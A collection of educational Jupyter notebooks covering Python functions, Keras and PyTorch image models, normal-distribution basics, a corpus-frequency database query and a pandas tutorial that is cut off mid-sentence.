f(10) g = lambda x, y, z: x + y ** 2 - z ** 3 g(1, 2, 3) ``` ## 6. Generalized function input Sometimes you will want to define a function that has a variable number of input arguments. Python's function syntax includes two variable length input objects: `*args` and `*kwargs`. `*args` is a list of the positional arguments, and `*kwargs` is a dictionary mapping the keywords to their argument. This is the most general forma of a function definition. ``` def report(*args, **kwargs): for i, arg in enumerate(args): print('Argument ' + str(i) + ':', arg) for key in kwargs: print("Keyword", key, "->", kwargs[key]) report("TK", 421, exceptional=False, missing=True) ``` Passing arguments or dictionaries through the variable length `*args` or `*kwargs` objects is often desireable for the targets of SciPy's root finders, solvers, and minimizers. ## 7. Some function best practices 1. Don't use global variables. Always explicitly pass everything in to a function that the function requires to execute. 2. Don't pass input arguments into a function that do not get used. This principle is helpful when one needs to debug code. 3. Don't create objects in the return line of a function. Even though it is easier and you can often write an entire function in one return line, it is much cleaner and more transparent to create all of your objects in the body of a function and only return objects that have already been created. ## References * [Python labs](http://www.acme.byu.edu/?page_id=2067), Applied and Computational Mathematics Emphasis (ACME), Brigham Young University.
github_jupyter
``` import numpy as np import matplotlib.pyplot as plt from keras.layers import Input, Dense from keras.models import Model from keras.datasets import fashion_mnist (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data() x_train.shape, x_test.shape, type(x_train) plt.imshow(x_train[1], cmap='binary') # Size of encoded representation # 32 floats denotes a compression factor of 24.5 assuming input is 784 float # we have 32*32 or 1024 floats encoding_dim = 32 #Input placeholder input_img = Input(shape=(784,)) #Encoded representation of input image encoded = Dense(encoding_dim, activation='relu', activity_regularizer=regularizers.l1(10e-5))(input_img) # Decode is lossy reconstruction of input decoded = Dense(784, activation='sigmoid')(encoded) # This autoencoder will map input to reconstructed output autoencoder = Model(input_img, decoded) autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy') autoencoder.summary() ''' The seperate encoder network ''' # Define a model which maps input images to the latent space encoder_network = Model(input_img, encoded) # Visualize network encoder_network.summary() ''' The seperate decoder network ''' # Placeholder to recieve the encoded (32-dimensional) representation as input encoded_input = Input(shape=(encoding_dim,)) # Decoder layer, retrieved from the aucoencoder model decoder_layer = autoencoder.layers[-1] # Define the decoder model, mapping the latent space to the output layer decoder_network = Model(encoded_input, decoder_layer(encoded_input)) # Visualize network decoder_network.summary() autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy') # Normalize pixel values x_train = x_train.astype('float32') / 255. x_test = x_test.astype('float32') / 255. # Flatten images to 2D arrays x_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:]))) x_test = x_test.reshape((len(x_test), np.prod(x_test.shape[1:]))) # Print out the shape print(x_train.shape) print(x_test.shape) plt.imshow(x_train[1].reshape(28,28)) autoencoder.fit(x_train, x_train, epochs=50, batch_size=256, shuffle=True, validation_data=(x_test, x_test)) # Time to encode some images encoded_imgs = encoder_network.predict(x_test) # Then decode them decoded_imgs = decoder_network.predict(encoded_imgs) # use Matplotlib (don't ask) import matplotlib.pyplot as plt plt.figure(figsize=(22, 6)) num_imgs = 9 for i in range(n): # display original ax = plt.subplot(2, num_imgs, i + 1) true_img = x_test[i].reshape(28, 28) plt.imshow(true_img) # display reconstruction ax = plt.subplot(2, num_imgs, i + 1 + num_imgs) reconstructed_img = decoded_imgs[i].reshape(28,28) plt.imshow(reconstructed_img) plt.show() ```
github_jupyter
# VGG-16 on CIFAR-10 ### Imports ``` import time import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from torchvision import datasets from torchvision import transforms from torch.utils.data import DataLoader if torch.cuda.is_available(): torch.backends.cudnn.deterministic = True ``` ### Settings and Dataset ``` # Device device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # Hyperparameters random_seed = 1 learning_rate = 0.001 num_epochs = 10 batch_size = 128 torch.manual_seed(random_seed) # Architecture num_features = 784 num_classes = 10 # Data train_dataset = datasets.CIFAR10(root='data', train=True, transform=transforms.ToTensor(), download=True) test_dataset = datasets.CIFAR10(root='data', train=False, transform=transforms.ToTensor()) train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True) test_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False) # Checking the dataset for images, labels in train_loader: print('Image batch dimensions:', images.shape) print('Image label dimensions:', labels.shape) break ``` ### Model ``` class VGG16(nn.Module): def __init__(self, num_classes): super(VGG16, self).__init__() self.block_1 = nn.Sequential( nn.Conv2d(in_channels=3, out_channels=64, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=64, out_channels=64, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2)) ) self.block_2 = nn.Sequential( nn.Conv2d(in_channels=64, out_channels=128, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=128, out_channels=128, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2)) ) self.block_3 = nn.Sequential( nn.Conv2d(in_channels=128, out_channels=256, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=256, out_channels=256, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=256, out_channels=256, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2)) ) self.block_4 = nn.Sequential( nn.Conv2d(in_channels=256, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=512, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=512, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2)) ) self.block_5 = nn.Sequential( nn.Conv2d(in_channels=512, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=512, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.Conv2d(in_channels=512, out_channels=512, kernel_size=(3, 3), stride=(1, 1), padding=1), nn.ReLU(), nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2)) ) self.classifier = nn.Sequential( nn.Linear(512, 4096), nn.ReLU(True), nn.Linear(4096, 4096), nn.ReLU(True), nn.Linear(4096, num_classes) ) for m in self.modules(): if isinstance(m, torch.nn.Conv2d) or isinstance(m, torch.nn.Linear): nn.init.kaiming_uniform_(m.weight, mode='fan_in', nonlinearity='relu') if m.bias is not None: m.bias.detach().zero_() def forward(self, x): x = self.block_1(x) x = self.block_2(x) x = self.block_3(x) x = self.block_4(x) x = self.block_5(x) x = torch.flatten(x, 1) logits = self.classifier(x) probas = F.softmax(logits, dim=1) return logits, probas model = VGG16(num_classes) model.to(device) optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) ``` ### Training ``` def compute_accuracy(model, data_loader): model.eval() correct_pred, num_examples = 0, 0 for i, (features, targets) in enumerate(data_loader): features = features.to(device) targets = targets.to(device) logits, probas = model(features) _, predicted_labels = torch.max(probas, 1) num_examples += targets.size(0) correct_pred += (predicted_labels == targets).sum() return correct_pred.float()/num_examples * 100 for epoch in range(num_epochs): model.train() for batch_idx, (features, targets) in enumerate(train_loader): features = features.to(device) targets = targets.to(device) # Forward and Backprop logits, probas = model(features) cost = F.cross_entropy(logits, targets) optimizer.zero_grad() cost.backward() # update model paramets optimizer.step() # Logging if not batch_idx % 50: print ('Epoch: %03d/%03d | Batch %04d/%04d | Cost: %.4f' %(epoch+1, num_epochs, batch_idx, len(train_loader), cost)) model.eval() with torch.set_grad_enabled(False): print('Epoch: %03d/%03d | Train: %.3f%% ' %( epoch+1, num_epochs, compute_accuracy(model, train_loader))) ``` ### Evaluation ``` with torch.set_grad_enabled(False): print('Test accuracy: %.2f%%' % (compute_accuracy(model, test_loader))) ```
github_jupyter
``` import tensorflow as tf from tensorflow import keras print( 'Tensorflow : ',tf.__version__) print( ' |-> Keras : ',keras.__version__) ``` # 5.1 - Introduction to convnets This notebook contains the code sample found in Chapter 5, Section 1 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments. ---- First, let's take a practical look at a very simple convnet example. We will use our convnet to classify MNIST digits, a task that you've already been through in Chapter 2, using a densely-connected network (our test accuracy then was 97.8%). Even though our convnet will be very basic, its accuracy will still blow out of the water that of the densely-connected model from Chapter 2. The 6 lines of code below show you what a basic convnet looks like. It's a stack of `Conv2D` and `MaxPooling2D` layers. We'll see in a minute what they do concretely. Importantly, a convnet takes as input tensors of shape `(image_height, image_width, image_channels)` (not including the batch dimension). In our case, we will configure our convnet to process inputs of size `(28, 28, 1)`, which is the format of MNIST images. We do this via passing the argument `input_shape=(28, 28, 1)` to our first layer. ``` from keras import layers from keras import models model = models.Sequential() model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1))) model.add(layers.MaxPooling2D((2, 2))) model.add(layers.Conv2D(64, (3, 3), activation='relu')) model.add(layers.MaxPooling2D((2, 2))) model.add(layers.Conv2D(64, (3, 3), activation='relu')) ``` Let's display the architecture of our convnet so far: ``` model.summary() ``` You can see above that the output of every `Conv2D` and `MaxPooling2D` layer is a 3D tensor of shape `(height, width, channels)`. The width and height dimensions tend to shrink as we go deeper in the network. The number of channels is controlled by the first argument passed to the `Conv2D` layers (e.g. 32 or 64). The next step would be to feed our last output tensor (of shape `(3, 3, 64)`) into a densely-connected classifier network like those you are already familiar with: a stack of `Dense` layers. These classifiers process vectors, which are 1D, whereas our current output is a 3D tensor. So first, we will have to flatten our 3D outputs to 1D, and then add a few `Dense` layers on top: ``` model.add(layers.Flatten()) model.add(layers.Dense(64, activation='relu')) model.add(layers.Dense(10, activation='softmax')) ``` We are going to do 10-way classification, so we use a final layer with 10 outputs and a softmax activation. Now here's what our network looks like: ``` model.summary() ``` As you can see, our `(3, 3, 64)` outputs were flattened into vectors of shape `(576,)`, before going through two `Dense` layers. Now, let's train our convnet on the MNIST digits. We will reuse a lot of the code we have already covered in the MNIST example from Chapter 2. ``` from keras.datasets import mnist from keras.utils import to_categorical (train_images, train_labels), (test_images, test_labels) = mnist.load_data() train_images = train_images.reshape((60000, 28, 28, 1)) train_images = train_images.astype('float32') / 255 test_images = test_images.reshape((10000, 28, 28, 1)) test_images = test_images.astype('float32') / 255 train_labels = to_categorical(train_labels) test_labels = to_categorical(test_labels) model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy']) model.fit(train_images, train_labels, epochs=5, batch_size=64) ``` Let's evaluate the model on the test data: ``` test_loss, test_acc = model.evaluate(test_images, test_labels) test_acc ``` While our densely-connected network from Chapter 2 had a test accuracy of 97.8%, our basic convnet has a test accuracy of 99.3%: we decreased our error rate by 68% (relative). Not bad!
github_jupyter
# Random Variables and The Normal Distribution #### Definition of a Random Variable A random variable is a number that describes the outcome of an event. We can never be certain what value a random variable will take until after the event happens. #### Examples of Random Variables | Event | Random Variable | |---------------------------------------------------------|-----------------------------------------| | Flipping a coin | 1 if heads, 0 if tails | | Rolling a die | What number will appear face up | | Completion of a thesis | The number of years it takes | | Weight of a dead cat's heart | How much the heart weighs in grams | | Calculating the average weight of 144 dead cats' hearts | How much the average weight is in grams | #### Probability Distribution Functions (PDFs) Although we can never be certain what value random variable can take on, we often know or can guess what's called a <font color='red'>probability distribution function</font> or <font color='red'>PDF</font> for short. PDF's tell you what the probability is that a random variable will take on a certain value. In other words they tell you the probability of an event going down a certain way. If the event you're concerned with is the completion of a thesis and the random variable is number of years it takes, then the PDF could tell you that taking 4.5 years has a probability of 0.4, 5 years has a probability of 0.3, 10 years has a probability of 0.05, etc. If you integrate PDFs over all values that a random variable can take the result will always be one. This makes sense because the sum of the probabilities of all possibilities has to be one i.e. one of the possibilities has to take place Note that continuous random variables like the number of years it takes to complete a thesis have PDFs, but discrete random variables like what number will face up when you roll a die have what's called <font color='red'>probability mass functions</font> or <font color='red'>PMFs</font>. This small detail is unimportant to know for this presentation, but is just a heads up for when you go out and read papers. #### The PDF of the Normal Distribution If X is a random variable, and its PDF is the following $$p(\,x\,|\,\mu, \sigma)= \frac{1}{\sqrt{2\pi\sigma^2}}\mathrm{exp}\left\{-\frac{1}{2}\left(\frac{x-\mu}{\sigma}\right)^2\right\}$$ then we say X is <font color='red'>normally distributed</font> or X follows the normal distribution. This means we can get the probability that X will take on certain values since it is normally distributed. To find the probability that X will equal 3.23 we simply plug in 3.23 for x in the above equation. There are many other distributions, in fact infinite, but the normal distribution is a famous one because many random variables we encounter out in the wild seem normally distributed. I mentioned that we can get the probability that X will equal 3.23 or any number for that matter, just from the above PDF, but we also need to know what $\mu$ and $\sigma$ above are to get that probability. $\mu$ and $\sigma$ are called the <font color='red'>parameters</font> of the normal distribution. The PDF depends on what values they take on. $\mu$ is called the <font color='red'>mean</font> of the normal distribution and $\sigma$ is called the <font color='red'>standard deviation</font> of the normal distribution. Below is the normal distribution plotted with several different parameters. <img src="Normal_Distribution_PDF.svg"> #### Mean or Expected Value Pretend that there are many, many alternate universes, and in each of these universes X takes on a different value. If we averaged the value that X took in all these universes the resulting number is called the <font color='red'>mean</font> or <font color='red'>expected value</font> of X. Every random variable has an expected value. Using the PDF you can calculate the expected value. For the normal distribution the expected value will always be $\mu$. #### Modes of Random Variables If we look at what value X took on the most times in all those alternate universes, the resulting value would be called the <font color='red'>mode</font> of the random variable X. Every random variable has a mode, and it is simply the maximum of the PDF. This makes sense because the mode is number that X will take on most often and thus with highest probability. For normal random variables, the mode happens to always be $\mu$. #### Standard Deviation or Variance of Random Variables Now say we have the expected value of a random variable. We can take the value X took on in all those alternate universes and find the squared distance from the mean. We do this by subtracting the mean from the value and squaring it. If we then took all these squared distances from the mean that X was in all these alternate universes and we average these squared distances then the result is called the <font color='red'>variance</font> of the random variable. The variance of a random variable tells you on average how far a random variable will fall from its mean. The square root of the variance is called the <font color='red'>standard deviation</font>. For the normal distribution the square root is $\sigma$.
github_jupyter
``` %load_ext autoreload %autoreload 2 import logging logging.basicConfig(format="%(asctime)s [%(process)d] %(levelname)-8s " "%(name)s,%(lineno)s\t%(message)s") logging.getLogger().setLevel('DEBUG') %matplotlib inline import numpy as np import pandas as pd import matplotlib.pyplot as plt from tqdm import tqdm_notebook as tqdm # Read information to connect to the database and put it in environment variables import os with open('ENVVARS.txt') as f: for line in f: parts = line.split('=') if len(parts) == 2: os.environ[parts[0]] = parts[1].strip() db_name = 'ticclat' #db_name = 'ticclat_test' os.environ['dbname'] = db_name from ticclat.ticclat_schema import corpusId_x_documentId, TextAttestation, Lexicon, Wordform, Anahash, Document, Corpus, WordformLink, WordformLinkSource, lexical_source_wordform from ticclat.dbutils import get_session, session_scope Session = get_session(os.environ['user'], os.environ['password'], os.environ['dbname']) from ticclat.queries import wfs_min_num_lexica with session_scope(Session) as session: r = wfs_min_num_lexica(session) for row in r: print(row) from ticclat.queries import count_unique_wfs_in_corpus with session_scope(Session) as session: r = count_unique_wfs_in_corpus(session, corpus_name='SoNaR-500') print(r.fetchall()) from ticclat.queries import wordform_in_corpus_over_time def wf_frequencies(session, wf, corpus_name): r = wordform_in_corpus_over_time(session, wf=word, corpus_name=corpus_name) records = [row for row in r.fetchall()] df = pd.DataFrame.from_records(records, columns=['wordform_id', 'wordform', 'pub_year', 'document_frequency', 'term_frequency']) df.sort_values(by=['pub_year'], inplace=True) df['term_frequency'] = df['term_frequency'].astype(int) return df word = 'regeering' corpus_name='Staten Generaal Digitaal' with session_scope(Session) as session: df = wf_frequencies(session, word, corpus_name) df.plot(x='pub_year', y=['term_frequency', 'document_frequency'], figsize=(10,5), grid=True, title=f'\"{word}\" in {corpus_name}') word = 'regering' corpus_name='Staten Generaal Digitaal' with session_scope(Session) as session: df2 = wf_frequencies(session, word, corpus_name) df2.plot(x='pub_year', y=['term_frequency', 'document_frequency'], figsize=(10,5), grid=True, title=f'\"{word}\" in {corpus_name}') from ticclat.queries import wordform_in_corpora word = 'regering' corpus_name='Staten Generaal Digitaal' with session_scope(Session) as session: r = wordform_in_corpora(session, wf=word) records = [row for row in r] df = pd.DataFrame.from_records(records, columns=['wordform_id', 'wordform', 'pub_year', 'document_frequency', 'term_frequency']) df.sort_values(by=['pub_year'], inplace=True) df['term_frequency'] = df['term_frequency'].astype(int) df.plot(x='pub_year', y=['term_frequency', 'document_frequency'], figsize=(10,5), grid=True, title=f'\"{word}\" in {corpus_name}') records = [row for row in r] df = pd.DataFrame.from_records(records) df df from sqlalchemy import select, text from sqlalchemy.sql import func, distinct, and_, desc def wordform_in_corpora_over_time(session, wf): """Given a wordform, and a corpus, return word frequencies over time. Gives both the term frequency and document frequency. """ q = select([Corpus.name, Document.pub_year, func.count(Document.document_id).label('document_frequency'), func.sum(TextAttestation.frequency).label('term_frequency'), func.sum(Document.word_count).label('num_words')]) \ .select_from(Corpus.__table__.join(corpusId_x_documentId, Corpus.corpus_id == corpusId_x_documentId.c.corpus_id) .join(Document, Document.document_id == corpusId_x_documentId.c.document_id) .join(TextAttestation).join(Wordform)) \ .where(Wordform.wordform == wf) \ .group_by(Corpus.name, Document.pub_year, Wordform.wordform, Wordform.wordform_id) print(f'Executing query:\n{q}') return pd.read_sql(q, session.connection()) with session_scope(Session) as session: r = wordform_in_corpora_over_time(session, wf='regering') r r['normalized_term_frequency'] = r['term_frequency'] / r['num_words'] * 100.0 r import holoviews as hv from IPython.display import HTML hv.notebook_extension() data = hv.Dataset(hv.Table(r[['name', 'pub_year', 'normalized_term_frequency']]), ['name', 'pub_year'], ['normalized_term_frequency']) print(data) data.to(hv.Curve, 'pub_year', 'normalized_term_frequency') ndoverlay = data.select().to(hv.Curve, 'pub_year', 'normalized_term_frequency').overlay('name') ndoverlay ```
github_jupyter
# Table of Contents - **Series** - **DataFrame** - Accessing a DataFrame - Boolean Indexing - Adding columns - Deleting columns - Importing Excel files as DataFrames - Missing Data - Writing and reading CSV files - **DataFrame Operations** - Matrix operations - Column operations - **Data Merging** - Concatenation - Joining - Merging - **Data Splitting** - Grouping - Unstacking **Pandas** is desgined to make **data pre-processing and data analysis fast and easy in Python**. Pandas adopts many coding idioms from NumPy, such as avoiding the `for` loops, but it is designed for working with heterogenous data represented in tabular format. To use Pandas, you need to import the `pandas` module, using for example: ``` import pandas as pd import numpy as np # we will also need numpy ``` This import style is quite standard; all objects and functions the `pandas` package will now be invoked with the `pd.` prefix. Pandas has two main data structures, **Series** and **DataFrame**. # Series Series are the Pandas version of 1-D Numpy arrays. An instance of Series is a single dimension array-like object containing: - a *sequence of values*, - an array of *data labels*, called its **index**. A Series can be created easily from a Python list: ``` ts = pd.Series([4, 8, 1, 3]) print(ts) ``` The underlying structure can be recovered with the `values` attribute: ``` print(ts.values) ``` The string representation of a Series display two columns: the first column represents the index array, the second column represents the values array. Since no index was specified, the default indexing consists of increasing integers starting from 0. To create a Series with its own index, you can write: ``` ts = pd.Series([4, 8, 1, 3], index=['first', 'second', 'third', 'fourth']) print(ts) ``` The labels in the index can be used to select values in the Series (note the list in the second line): ``` print(ts['first']) print(ts[['second', 'fourth']]) ``` Using NumPy functions or NumPy-like operations, such as boolean indexing, universal functions, and so on, will preserve the indexes: ``` print(ts[ts > 3]) print(np.exp(ts)) ``` You can think about a Series as a kind of fixed-length, ordered Python's `dict`, mapping index values to data values. In fact, it is possible to create a Series directlty from a Python's `dict`: ``` my_dict = {'Pisa': 80, 'London': 300, 'Paris': 1} ts = pd.Series(my_dict) print(ts) ``` Arithmetic operations on Series are automatically aligned on the index labels: ``` ts1 = pd.Series([4, 8, 1, 3], index=['first', 'second', 'third', 'fourth']) ts2 = pd.Series([4, 8, 1], index=['first', 'second', 'pisa']) ts1 ts2 ts_sum = ts1 + ts2 print(ts_sum) ``` Here two index values are correctly computed (corresponding to the label `first` and `second`). The two other index labels `third` and `fourth` in `ts1` are missing in `ts2`, as well as the `pisa` index label in `ts2`. Hence, for each of these index label, a `NaN` value (*not a number*) appears, which Pandas considers as a **missing value**. The `pd.isnull` and `pd.notnull` functions detects missing data, as well as the corresponding instance methods: ``` print(pd.isnull(ts_sum)) print(ts_sum.notnull()) ``` Both Series and its index have a `name` attribute: ``` ts_sum.name = 'sum' ts_sum.index.name = 'new name' print(ts_sum) ``` # DataFrame A DataFrame is a rectangular table of data. It contains an ordered list of columns. Every column can be of a different type. A DataFrame has both a *row index* and a *column index*. It can be thought as a dict of Series (one per column) all sharing the same index labels. There are many way to construct a DataFrame, but the most common is using a dictionary of Python's lists (or NumPy's arrays): ``` cars = {'Brand': ['Honda Civic', 'Toyota Corolla', 'Ford Focus', 'Audi A4'], 'Price': [22000, 25000, 27000, 35000], 'Wheels': 4} # broadcast if possible df = pd.DataFrame(cars) print(df) ``` The resulting DataFrame will receive its index automatically as with Series. To pretty-print a DataFrame in a Jupyter notebooks, it is enough to write its name (or using the `head()` instance method for very long DataFrames): ``` df df.head(2) df.tail(2) ``` A summary of the *numerical* data is provided by `describe`: ``` df.describe() ``` It is possible to change the order of the colums at DataFrame construction time. If you provide a column's name not included in the dictionary, a column with missing values will appear: ``` df = pd.DataFrame(cars, columns=['Color', 'Price', 'Brand', 'Wheels']) print(df) ``` If working with a large table, it might be useful to sometimes have a list of all the columns' names. This is given by the `keys()` methods: ``` print(df.keys()) print(df.columns) ``` Many feature from the NumPy package can be directly used with Pandas DataFrames ``` print(df.values) print(df.shape) ``` Another common way to create a DataFrame is to use a *nested dict of dicts*: ``` pop = {'Nevada': {2001: 2.4, 2002: 2.9}, 'Ohio': {2000: 1.5, 2001: 1.7, 2002: 3.6}} ``` If this nested dict is passed to the DataFrame, the outer dict keys are interpreted as column labels, and the inner keys are interpreted as row labels: ``` df = pd.DataFrame(pop) df ``` ## Accessing a DataFrame Let's create a brand new DataFrame: ``` dict_of_list = {'birth': [1860, 1770, 1858, 1906], 'death':[1911, 1827, 1924, 1975], 'city':['Kaliste', 'Bonn', 'Lucques', 'Saint-Petersburg']} composers_df = pd.DataFrame(dict_of_list, index=['Mahler', 'Beethoven', 'Puccini', 'Shostakovich']) composers_df ``` There are multiple ways of accessing values or series of values in a Dataframe. Unlike in Series, a simple bracket gives access to a column and not an index, for example: ``` composers_df['city'] ``` returns a Series. Alternatively one can also use the attributes syntax and access columns by using: ``` composers_df.city ``` The attributes syntax has some limitations, so in case something does not work as expected, revert to the brackets notation. When specifiying multiple columns, a DataFrame is returned: ``` composers_df[['city', 'birth']] ``` from the [docs](https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html): >The Python and NumPy indexing operators [$\cdot$] and attribute operator `.` provide quick and easy access to pandas data structures across a wide range of use cases. This makes interactive work intuitive, as there’s little new to learn if you already know how to deal with Python dictionaries and NumPy arrays. However, since the type of the data to be accessed isn’t known in advance, directly using standard operators has some optimization limits. For production code, we recommended that you take advantage of the optimized pandas data access methods exposed in this chapter. Standard indexing operators (just slices the rows) ``` composers_df[0:2] ``` Pandas optimized data access methods: `iloc` and `loc`. **Remember that `loc` and `iloc` are attributes, not methods, hence they use brackets `[]` and not parenthesis `()`.** The `loc` attribute allows to recover elements by using the index labels, while the `iloc` attribute can be used to recover the regular indexing: ``` print(composers_df.iloc[0:2,:]) print() print(composers_df.loc[['Mahler','Beethoven'], 'death']) print() print(composers_df.loc['Beethoven', 'death']) ``` ## Boolean Indexing Just like with Numpy, it is possible to subselect parts of a Dataframe using boolean indexing. A logical Series can be used as an index to select elements in the Dataframe. ``` composers_df mask = composers_df['death'] > 1859 print(mask) composers_df[mask] ``` More compact: ``` composers_df[composers_df['birth'] > 1900] ``` Using `isin`: ``` composers_df[composers_df['birth'].isin([1906,1858])] ``` ## Adding columns It is very simple to add a column to a Dataframe: ``` composers_df['country'] = '???' composers_df ``` Alternatively, an existing list can be used: ``` composers_df['country2'] = ['Austria','Germany','Italy','Russia'] composers_df ``` ## Deleting columns The `del`keyword is used to delete columns: ``` del composers_df['country'] composers_df ``` ## Importing Excel files as DataFrames Another very common way of "creating" a Pandas Dataframe is by importing a table from another format like CSV or Excel. You may need to install `xlrd` package: ```shell > pip install xlrd ``` ``` # !pip install xlrd ``` An Excel table is provided in the [composers.xlsx](data/composers.xlsx) file and can be read with the `pd.read_excel` function. There are many more readers for other types of data (csv, json, html etc.) but we focus here on Excel. ``` composers_df = pd.read_excel('data/composers.xlsx') composers_df ``` The reader automatically recognized the heaers of the file. However it created a new index. If needed we can specify which column to use as header: ``` composers_df = pd.read_excel('data/composers.xlsx', index_col = 'composer') composers_df ``` If we open the file in Excel, we see that it is composed of more than one sheet. Clearly, when not specifying anything, the reader only reads the first sheet. However we can specify a sheet: ``` composers_df = pd.read_excel('data/composers.xlsx', index_col = 'composer', sheet_name='Sheet2') composers_df ``` As you can see above, some information is missing. Some missing values are marked as "`unknown`" while other are `NaN`. `NaN` is the standard symbol for unknown/missing values and is understood by Pandas while "`unknown`" is just seen as text. This is impractical as now we have columns with a mix of numbers and text which will make later computations difficult. What we would like to do is to replace all "irrelevant" values with the standard `NaN` symbol that says "*no information*". For this we can use the `na_values` argument to specify what should be a `NaN`: ``` composers_df = pd.read_excel('data/composers.xlsx', index_col = 'composer', sheet_name='Sheet2', na_values=['unknown']) composers_df ``` ## Missing data pandas primarily uses the value `np.nan` to represent missing data. It is by default not included in computations. ``` df_new = composers_df.copy() df_new ``` Get a boolean mask where values are `np.nan` ``` pd.isna(df_new) ``` To drop missing data. ``` df_new.dropna(how='any') df_new.dropna(how = 'all') # the whole row (or column) must be np.nan ``` Filling missing data ``` df_new.fillna(value=5) ``` ## Writing and reading - CSV files ``` df_new.to_csv('data/foo.csv') df_read = pd.read_csv('data/foo.csv') df_read df_read = pd.read_csv('data/foo.csv',index_col = 'composer') df_read ``` ### Exercise [This repository](https://github.com/pcm-dpc/COVID-19) hosts the updated information about the evolution of the pandemic in Italy (as provided by the "Dipartimento della Protezione Civile). One way to programmatically get access to the data is through `urllib`: ``` import urllib CSV_URL = "https://raw.githubusercontent.com/pcm-dpc/COVID-19/master/dati-andamento-nazionale/dpc-covid19-ita-andamento-nazionale.csv" with urllib.request.urlopen(CSV_URL) as f: df = pd.read_csv(f,index_col = 0) df df.head() df.tail(1) df.columns ita_eng_columns = {'stato':'state', 'ricoverati_con_sintomi':'hospitalized_with_symptoms', 'terapia_intensiva': 'intensive_care', 'totale_ospedalizzati': 'total_hospitalized', 'isolamento_domiciliare': 'home_isolation', 'totale_positivi': 'total_positive', 'variazione_totale_positivi':'total_positive_variation', 'nuovi_positivi': 'new_positive', 'dimessi_guariti': 'healed', 'deceduti': 'deaths', 'casi_da_sospetto_diagnostico': 'positive_by_symtoms', 'casi_da_screening': 'positive_by_screening', 'totale_casi': 'total_cases', 'tamponi': 'pcr', 'casi_testati': 'tested_cases', 'note':'notes'} # uncomment to translate columns names in english # df.columns = [ita_eng_columns[x] for x in df.columns] df ``` Process and explore your data: - is it properly formatted? - are there missing values? - Tired of difficult to interpret graphics? Make your own! # DataFrame Operations One of the great advantages of using Pandas to handle tabular data is how simple it is to extract valuable information from them. Here we are going to see various types of operations that are available for this. ## Matrix operations The strength of Numpy is its natural way of handling matrix operations, and Pandas reuses a lot of these features. For example one can use simple mathematical operations to opereate at the cell level: ``` df = pd.read_excel('data/composers.xlsx') df df['birth'] * 2 np.log(df['birth']) ``` We can directly use an operation's output to create a new column: ``` df['age'] = df['death'] - df['birth'] df ``` Here we applied functions only to series. Indeed, since our Dataframe contains e.g. strings, no operation can be done on it. If however we have a homogenous Dataframe, this is possible: ``` df[['birth', 'death']] * 2 ``` ## Column operations There are other types of functions whose purpose is to summarize the data. For example the mean or standard deviation. Pandas by default applies such functions column-wise and returns a series containing e.g. the mean of each column: ``` np.mean(df) ``` Note that columns for which a mean does not make sense, like the city are discarded. Sometimes one needs to apply to a column a very specific function that is not provided by default. In that case we can use one of the different `apply` methods of Pandas. The simplest case is to apply a function to a column, or Series of a DataFrame. Let's say for example that we want to define the age >60 as 'old' and <60 as 'young'. We can define the following general function: ``` define_age = lambda x: 'old' if x > 60 else 'young' ``` We can now apply this function on an entire Series: ``` df['categorical age'] = df.age.apply(define_age) df ``` We can also apply a function to an entire DataFrame. For example we can ask how many composers have birth and death dates within the XIXth century: ``` df[['birth','death']].apply(lambda x: np.sum((x >= 1800) & (x < 1900))) ``` ### Histogramming ``` df['categorical age'].value_counts() ``` # Data Merging Often information is comming from different sources and it is necessary to combine it into one object. We are going to see the different ways in which information contained within separate Dataframes can be combined in a meaningful way. ## Concatenation The simplest way we can combine two Dataframes is simply to "paste" them together: ``` composers1 = pd.read_excel('data/composers.xlsx', index_col='composer',sheet_name='Sheet1') composers1 composers2 = pd.read_excel('data/composers.xlsx', index_col='composer',sheet_name='Sheet3') composers2 ``` To be concatenated, Dataframes need to be provided as a list to the `pd.concat` method: ``` all_composers = pd.concat([composers1,composers2]) all_composers ``` One potential problem is that two tables contain duplicated information: ``` all_composers.loc['Mahler'] ``` It is very easy to get rid of it using: ``` pd.DataFrame.drop_duplicates? DataFrame().drop_duplicates all_composers.drop_duplicates() ``` ## Joining Another classical case is that of two list with similar index but containing different information: ``` composers1 = pd.read_excel('data/composers.xlsx', index_col='composer',sheet_name='Sheet1') composers1 composers2 = pd.read_excel('data/composers.xlsx', index_col='composer',sheet_name='Sheet4') composers2 ``` If we use simple concatenation, this doesn't help us much. We just end up with a large matrix with lots of `NaN`'s: ``` pd.concat([composers1, composers2]) ``` The better way of doing this is to **join** the tables. This is a classical database concept avaialble in 